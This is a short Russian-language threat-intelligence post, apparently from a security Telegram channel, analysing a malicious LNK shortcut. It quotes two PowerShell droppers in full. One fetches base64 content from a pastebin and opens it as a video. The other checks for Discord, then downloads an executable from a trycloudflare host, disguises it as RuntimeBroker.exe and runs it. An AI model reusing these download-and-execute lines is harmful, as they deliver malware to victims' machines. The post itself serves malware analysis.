LNK файл с командой, которая качала видео пару недель назад:
-c "$b=(irm https://pastes.io/raw/aaaaigz0ex);[IO.File]::WriteAllBytes(\"$env:TEMP\v.mp4\",[Convert]::FromBase64String($b));start $env:TEMP\v.mp4"
Но забавно что сейчас на этом пастбине висит другой скрипт:
if (!(Test-Path "$env:LOCALAPPDATA\Discord\*\Discord.exe") -and !(Get-PSDrive -PSProvider FileSystem | ForEach-Object { Get-ChildItem -Path $_.Root -Filter "Discord.exe" -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1 })) { exit }
Invoke-WebRequest -OutFile $env:AppData\RuntimeBroker.exe -Uri https://enjoyed-hop-definitions-tee.trycloudflare.com/64.exe
start $env:AppData\RuntimeBroker.exe
Интересно что это за аудитория, которую таргетят путем поиска дискорда на машине. Вероятно та же аудитория, что и писала этот скрипт😂 Пейлоад, увы, уже не доступен.
VirusTotal
❤@seclemur |❤ @threat_chat